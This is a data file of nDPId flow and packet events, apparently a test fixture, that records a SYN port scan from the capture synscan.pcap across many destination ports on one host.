-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsDk0AACcGEyasEAAIQA2GNIzSKUbdUoMYAAAAAGACEAD\/SAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsp10AAC8GchWsEAAIQA2GNIzSBJHdUoMYAAAAAGACEAAj\/gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsnbsAADAGeresEAAIQA2GNIzSJATdUoMYAAAAAGACBAAQiwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ54AAC0G89SsEAAIQA2GNIzTA+fdU4MZAAAAAGACCAAspQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsac0AADIGrKWsEAAIQA2GNIzTBEDdU4MZAAAAAGACDAAoTAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":558,"source":"synscan.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"synscan.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAs1CgAADgGPEqsEAAIQA2GNIzTDb3dU4MZAAAAAGACBAAmzwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"synscan.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"synscan.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsz\/oAACoGTnisEAAIQA2GNIzTH1XdU4MZAAAAAGACDAANNwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":560,"source":"synscan.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"synscan.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsMpkAADcG3tmsEAAIQA2GNIzTFmLdU4MZAAAAAGACEAASKgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAswBUAADIGVl2sEAAIQA2GNIzTF4ndU4MZAAAAAGACDAAVAwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsw0kAACoGWymsEAAIQA2GNIzTAdDdU4MZAAAAAGACDAAqvAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"synscan.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"synscan.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsLY8AADMG5+OsEAAIQA2GNIzTB93dU4MZAAAAAGACEAAgrwAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"synscan.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"synscan.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAs8DEAACsGLUGsEAAIQA2GNIzTAAfdU4MZAAAAAGACEAAohQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":565,"source":"synscan.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"synscan.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsfrwAADUGlLasEAAIQA2GNIzTJ2LdU4MZAAAAAGACCAAJKgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":566,"source":"synscan.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"synscan.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsWGYAACYGygysEAAIQA2GNIzTiqzdU4MZAAAAAGACDACh3wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"synscan.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"synscan.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsiV4AACoGlRSsEAAIQA2GNIzTJXvdU4MZAAAAAGACDAAHEQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059406,"pkt":"ACYLMQczACWzv5HuCABFAAAsgV0AADcGkBWsEAAIQA2GNIzTBOvdU4MZAAAAAGACEAAjoQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"synscan.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"synscan.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059406,"pkt":"ACYLMQczACWzv5HuCABFAAAsCGAAACgGGBOsEAAIQA2GNIzTgAjdU4MZAAAAAGACBAC0gwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":570,"source":"synscan.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"synscan.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059406,"pkt":"ACYLMQczACWzv5HuCABFAAAsAjcAADUGETysEAAIQA2GNIzTBCndU4MZAAAAAGACCAAsYwAAAgQFtA=="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":2,"flow_last_seen":1278275059407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275059407,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACABxjN09N4eJ3FKCGVAUAACM+wAAAAAAAAAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"synscan.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059408,"flow_last_seen":1278275059408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059408,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"synscan.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1278275059408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059408,"pkt":"ACYLMQczACWzv5HuCABFAAAsOWsAAC4G4QesEAAIQA2GNIzSANTdUoMYAAAAAGACDAAruwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":573,"source":"synscan.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"synscan.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsMW0AACoG7QWsEAAIQA2GNIzS\/mndUoMYAAAAAGACDAAuJQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":574,"source":"synscan.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":574,"source":"synscan.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsLzIAADsG3kCsEAAIQA2GNIzSBKHdUoMYAAAAAGACEAAj7gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"synscan.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"synscan.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAspIkAADYGbemsEAAIQA2GNIzSIzHdUoMYAAAAAGACDAAJXgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"synscan.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"synscan.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsMNEAACwG66GsEAAIQA2GNIzSBODdUoMYAAAAAGACBAAvrwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"synscan.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"synscan.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsIoAAACUGAPOsEAAIQA2GNIzSBCLdUoMYAAAAAGACCAAsbQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"synscan.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 